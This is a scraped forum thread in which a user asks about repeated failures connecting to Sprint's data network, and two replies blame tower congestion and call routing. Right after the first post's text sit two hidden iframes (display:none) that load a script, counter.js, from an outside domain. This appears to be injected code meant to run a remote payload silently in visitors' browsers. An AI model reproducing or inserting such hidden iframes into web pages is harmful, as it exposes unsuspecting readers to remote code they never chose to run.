+ Reply to Thread
Results 1 to 3 of 3
  1. #1
    Registered User
    Join Date
    12-29-2001
    Posts
    160

    Data Connection Problems?

    It seems to me that I almost always have to try to connect to the Sprint data network multiple times before a session can be established. It is rare that a connection occurs on the very first time. Is anyone else having this problem, or is there any way to make this more foolproof?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    10-24-2001
    Location
    HotLanta, GA
    Posts
    1,138
    I think this has been discussed at length in another thread. I believe the gist of it was that it is pretty common, but Sprint does not charge any minutes for the call unless you get connected. If you call your own ISP and do not get connected, you will be dinged for a minute of time. You may want to do a search. I have this problem from time to time, but would estimate I get connect about 75% on the first time and make on average about 4 data calls a day to Sprint.
    Carl

  3. #3
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048

    Arrow

    carl is so right...
    you have multiple users on a tower at a time and if you try to connect you may be in the "que"... never fear though... its not a problem with the phone.

    i have had that happen to me once or twice but not a lot.

    look at your bill and under the wireless web look at where your data calls route to (if you have detailed billing). it could be in another city... when i made data calls in chattaonooga tennessee, the data calls would route to knoxviiille.. 100 miles away. :p

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts